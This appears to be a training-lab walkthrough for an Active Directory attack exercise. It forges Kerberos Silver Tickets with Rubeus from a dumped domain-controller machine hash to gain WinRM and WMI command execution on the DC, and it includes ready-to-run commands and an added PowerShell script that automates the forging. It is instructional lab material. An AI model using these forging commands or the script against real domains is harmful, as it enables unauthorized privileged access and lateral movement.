9 - LO9

Learning Objective 9

Tasks

1 - Try to get command execution on the domain controller by creating silver ticket for:

  • HTTP

  • WMI

Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

Solutions

1 - Try to get command execution on the domain controller by creating silver ticket for:

From the previous task we already have the NTLM hash of the domain controller's machine account (dcorp-dc$), which is the key that signs service tickets for every SPN on that host:

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : e4ce16e20da2e11d2901e0fb8a4f28b0

HTTP

A Silver Ticket for the HTTP SPN of dcorp-dc gives us access to WinRM (winrs and PowerShell Remoting) on the DC. Because the ticket is forged offline with the machine account hash, the KDC is never contacted and no TGS request is logged for it:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Check that the ticket was injected into the current logon session with klist (or Rubeus klist through the loader):

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist

The output should list the forged service ticket:

http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL

Now try accessing it with winrs. Note that we use the FQDN of dcorp-dc because that is the host part of the SPN in the forged ticket; connecting with a different name would not match the cached ticket. Inside the remote shell, set username and set computername confirm the user context and the host we landed on:

winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
set username
set computername

WMI

WMI over DCOM authenticates to two SPNs, so we need two Silver Tickets for the same host: one for the HOST service and one for RPCSS. Both are signed with the same dcorp-dc$ hash.

Run the following from an elevated shell. The /rc4 value must be the current NTLM hash of dcorp-dc$; the hash in these commands differs from the one dumped above, so use whichever value is current in your lab instance (a stale hash produces a ticket the DC silently rejects):

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Verify with klist that both tickets (host/dcorp-dc.dollarcorp.moneycorp.local and rpcss/dcorp-dc.dollarcorp.moneycorp.local) are present in the cache, then run a WMI query against the domain controller:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

As with winrs, the target name must be the FQDN used in the forged SPNs so that the cached tickets are selected.
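The HTTP and WMI steps above follow the same pattern: forge one ticket per SPN the remoting method needs, then confirm each ticket actually landed in the cache before connecting. The following PowerShell wraps that procedure; it is an added example, not code from the lab or its solution. It assumes the same Loader.exe/Rubeus.exe paths and the evasive-silver syntax shown above, and takes the domain SID and the dcorp-dc$ hash as parameters rather than hard-coding the values from this page.

```powershell
# Added example (not part of the original lab solution).
# Forges one Silver Ticket per SPN using the Loader.exe/Rubeus.exe invocation from the
# walkthrough, then parses klist to confirm each ticket was injected before we connect.
# Paths, the domain SID and the machine-account hash are assumptions/parameters.

function Get-SilverTicketSpns {
    # Map a remoting method to the SPNs its Silver Ticket(s) must cover.
    param(
        [Parameter(Mandatory)][ValidateSet('WinRM','WMI')][string]$Method,
        [Parameter(Mandatory)][string]$TargetFqdn
    )
    $services = switch ($Method) {
        'WinRM' { @('http') }           # winrs / PowerShell Remoting
        'WMI'   { @('host','rpcss') }   # WMI over DCOM needs both HOST and RPCSS
    }
    foreach ($svc in $services) { "$svc/$TargetFqdn" }
}

function Test-CachedServiceTicket {
    # $true if klist shows a ticket whose "Server:" line matches the SPN (case-insensitive).
    # KlistOutput can be supplied explicitly (e.g. captured text) for offline checks.
    param(
        [Parameter(Mandatory)][string]$Spn,
        [string[]]$KlistOutput = (klist)
    )
    $pattern = '^\s*Server:\s*' + [regex]::Escape($Spn) + '\s*@'
    return [bool]($KlistOutput | Where-Object { $_ -imatch $pattern })
}

function New-SilverTicketSet {
    param(
        [Parameter(Mandatory)][ValidateSet('WinRM','WMI')][string]$Method,
        [Parameter(Mandatory)][string]$TargetFqdn,   # must equal the name you later connect to
        [Parameter(Mandatory)][string]$Rc4,          # current NTLM hash of the target machine account
        [Parameter(Mandatory)][string]$DomainSid,
        [string]$Domain = 'dollarcorp.moneycorp.local',
        [string]$User   = 'Administrator',
        [string]$Loader = 'C:\AD\Tools\Loader.exe',  # assumed path, as in the walkthrough
        [string]$Rubeus = 'C:\AD\Tools\Rubeus.exe'   # assumed path, as in the walkthrough
    )
    $results = foreach ($spn in (Get-SilverTicketSpns -Method $Method -TargetFqdn $TargetFqdn)) {
        # Same command line as the solution, one ticket per SPN, injected with /ptt.
        & $Loader -path $Rubeus -args evasive-silver "/service:$spn" "/rc4:$Rc4" `
            "/sid:$DomainSid" /ldap "/user:$User" "/domain:$Domain" /ptt | Out-Null
        [pscustomobject]@{ Spn = $spn; Injected = (Test-CachedServiceTicket -Spn $spn) }
    }
    $results | Format-Table -AutoSize | Out-Host
    if ($results.Injected -contains $false) {
        throw 'At least one ticket is missing from the cache; re-check the hash and domain SID.'
    }
    return $results
}

# Usage (placeholder values taken from the walkthrough; replace with your own lab's):
# New-SilverTicketSet -Method WMI -TargetFqdn dcorp-dc.dollarcorp.moneycorp.local `
#     -Rc4 e4ce16e20da2e11d2901e0fb8a4f28b0 -DomainSid S-1-5-21-719815819-3726368948-3917688648
# Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

The cache check matters because a Silver Ticket with a wrong hash or SID is still accepted by Rubeus and injected; the failure only surfaces when the target service rejects the PAC signature, so verifying the SPN string in klist before connecting saves a confusing access-denied. Run it from the same elevated session you use for the WMI query, since the injected tickets belong to that logon session.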

Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

As seen in the previous task, the XXXX service's Silver Ticket is the one that can be used for winrs or PowerShell Remoting.
